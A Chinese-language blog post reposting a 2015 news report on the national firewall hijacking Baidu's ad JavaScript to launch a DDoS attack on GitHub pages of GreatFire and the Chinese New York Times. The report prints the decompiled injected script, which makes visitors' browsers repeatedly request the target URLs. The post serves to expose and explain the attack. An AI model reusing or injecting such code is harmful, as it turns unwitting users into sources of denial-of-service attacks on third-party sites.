設萬維讀者為首頁 萬維讀者網 -- 全球華人的精神家園 廣告服務 聯繫我們 關於萬維
 
首  頁 新  聞 視  頻 博  客 論  壇 分類廣告 購  物
搜索>> 發表日誌 控制面板 個人相冊 給我留言
幫助 退出
 
清揚飛舞  
??  
我的名片
清揚
註冊日期: 2007-09-05
訪問總量: 86,106 次
點擊查看我的個人資料
Calendar
我的公告欄
花與刺的敬語:枝上有花也有刺.花欣賞刺.刺保護花.
清揚飛舞
最新發布
· 關於新浪博客瀏覽出現的奇特狀況
· 不解的天涯。。
· 玩
友好鏈接
· 夏天的霧:夏天的霧
· 意味:意味
· 甩了:先有甩掉付出之心,才有收
· 天宇:天宇的空間
分類目錄
【生活隨筆.】
· 關於新浪博客瀏覽出現的奇特狀況
· 玩
【琴玄.韻律.:】
【現代藝術:鑑賞.】
【國畫鑑賞:山水.人物】
【樂器.鑑賞.】
【書頁:散文與詩】
【影像.圖片:】
【裝飾藝術世界.】
【書海尋珍.鑑賞】
【社會反光鏡】
· 不解的天涯。。
【童趣(動畫.卡通)】
【情感畫冊】
存檔目錄
03/01/2015 - 03/31/2015
11/01/2013 - 11/30/2013
05/01/2013 - 05/31/2013
04/01/2011 - 04/30/2011
12/01/2010 - 12/31/2010
11/01/2010 - 11/30/2010
08/01/2010 - 08/31/2010
09/01/2009 - 09/30/2009
08/01/2009 - 08/31/2009
07/01/2009 - 07/31/2009
06/01/2009 - 06/30/2009
05/01/2009 - 05/31/2009
04/01/2009 - 04/30/2009
03/01/2009 - 03/31/2009
02/01/2009 - 02/28/2009
01/01/2009 - 01/31/2009
12/01/2008 - 12/31/2008
11/01/2008 - 11/30/2008
10/01/2008 - 10/31/2008
09/01/2008 - 09/30/2008
08/01/2008 - 08/31/2008
07/01/2008 - 07/31/2008
06/01/2008 - 06/30/2008
05/01/2008 - 05/31/2008
04/01/2008 - 04/30/2008
03/01/2008 - 03/31/2008
02/01/2008 - 02/29/2008
01/01/2008 - 01/31/2008
12/01/2007 - 12/31/2007
11/01/2007 - 11/30/2007
10/01/2007 - 10/31/2007
09/01/2007 - 09/30/2007
發表評論
作者:
用戶名: 密碼: 您還不是博客/論壇用戶?現在就註冊!
     
評論:
關於新浪博客瀏覽出現的奇特狀況
   

關於新浪博客瀏覽出現的奇特狀況,我在解決問題的時候,搜索到這篇文章,和我點擊瀏覽新浪博客首頁任意博文出現的狀況一摸一樣。給新浪博客客服聯繫,都裝聾作啞,沒任何回復。

這是我瀏覽新浪博客時出現的狀況,就照了下來。


message from webpage
WARNING:malicious javascript detected on this domain

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

 

中國的國家防火牆調用民間流量攻擊境外網站
請看博訊熱點:網絡封鎖和壓制

(博訊北京時間2015年3月27日首發 - 支持此文作者/記者)

    26日9時(Pacific Daylight Time,北京時間27日12時)左右開始,從境外訪問v.baidu.com的時候發現會出現Javascript alert出現的彈窗:

WARNING: malicious javascript detected on this domain 追查了一下發現是百度廣告管家的js http://cbjs.baidu.com/js/m.js?_=1427431567741
在境外訪問時被替換成一段特殊的js。詳細請求和返回的js見:http://pastie.org/10056531

反編譯後代碼大致如下:
"document.write(" src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>x3c/script>");!window.jQuery&&document.write(" src='http://code.jquery.com/jquery-latest.js'>x3c/script>");startime=(new
Date).getTime();var count=0;function unixtime(){var a=new Date;return
Date.UTC(a.getFullYear(),a.getMonth(),a.getDay(),a.getHours(),a.getMinutes(),a.getSeconds())/1E3}url_array=["https://github.com/greatfire/","https://github.com/cn-nytimes/"];NUM=url_array.length;function
r_send2(){var a=unixtime()%NUM;get(url_array[a])}function get(a){var
b;$.ajax({url:a,dataType:"script",timeout:1E4,cache:!0,beforeSend:function(){requestTime=(new
Date).getTime()},complete:function(){responseTime=(new
Date).getTime();b=Math.floor(responseTime-requestTime);3E5>responseTime-startime&&(r_send(b),count+=1)}})}function
r_send(a){setTimeout("r_send2()",a)}setTimeout("r_send2()",2E3);"

很明顯看出兩個攻擊目標: https://github.com/greatfire/ 和 https://github.com/cn-nytimes/

大致的流程就是:

1. GFW把某些常見網站的JS替換成以上js

2. 全球各地訪問國內網站時,相當於成為DoS的源(可能還有全國各地訪問國外時,未經確認)

3. GitHub不堪重負,把 https://github.com/greatfire/ 和
https://github.com/cn-nytimes/ 的返回改成一個alert: WARNING: malicious
javascript detected on this domain (網站存在惡意JS代碼調用)

當境外用戶訪問內置境內一些網站如百度的JS調用的網站時,中國的國家防火牆GFW將這部分調用替換成重定向至目標網站,以調用民用流量的方式,實現對目標網站的DDOS攻擊。中國網絡審查監測機構Greatfire和紐約時報中文網目前尚未就此作出回應。 [博訊首發,轉載請註明出處]- 支持此文作者/記者()
4941430       

http://www.boxun.com/news/gb/china/2015/03/201503271431.shtml#.VRsCJkDD_IU

 
關於本站 | 廣告服務 | 聯繫我們 | 招聘信息 | 網站導航 | 隱私保護
Copyright (C) 1998-2024. Creaders.NET. All Rights Reserved.